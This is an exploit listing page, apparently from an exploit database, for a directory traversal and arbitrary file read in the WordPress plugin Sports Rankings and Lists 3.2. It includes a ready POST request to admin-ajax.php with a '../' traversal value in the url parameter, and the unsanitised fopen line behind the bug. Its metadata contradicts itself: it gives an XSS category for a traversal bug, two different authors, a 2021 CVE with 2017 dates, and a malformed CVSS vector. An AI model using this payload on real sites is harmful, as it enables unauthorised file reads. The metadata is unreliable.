Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-24389 | CWE-79 | $1000 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
ExploitAuthor123 | High | Remote | 2017-03-20 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.7573 | 0.999 |
Wordpress plugin Sports Rankings and Lists directory # Exploit Title: Wordpress plugin Sports Rankings and Lists directory traversal and arbitrary csv file read # Date: 2017-03-17 # Exploit Author: malwrforensics # Vendor Homepage: https://fantasyknuckleheads.com/ # Software Link: https://downloads.wordpress.org/plugin/sports-rankings-lists.zip # Version: 3.2 # Tested on: Ubuntu 16.04 HTTP Req: POST http://<server>/wp-admin/admin-ajax.php HTTP/1.1 <snip> Referer: http://<server>/wp-admin/post-new.php?post_type=player_list action=import_players_from_csv&url=../../../../../../../usr/share/distro-info/debian.csv Details ------- File: import_players.php Reason: The first parameter of the fopen function isn't properly sanitized. <snip> else if (($handle = fopen($_POST['url'], "r")) !== FALSE) { <snip>
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.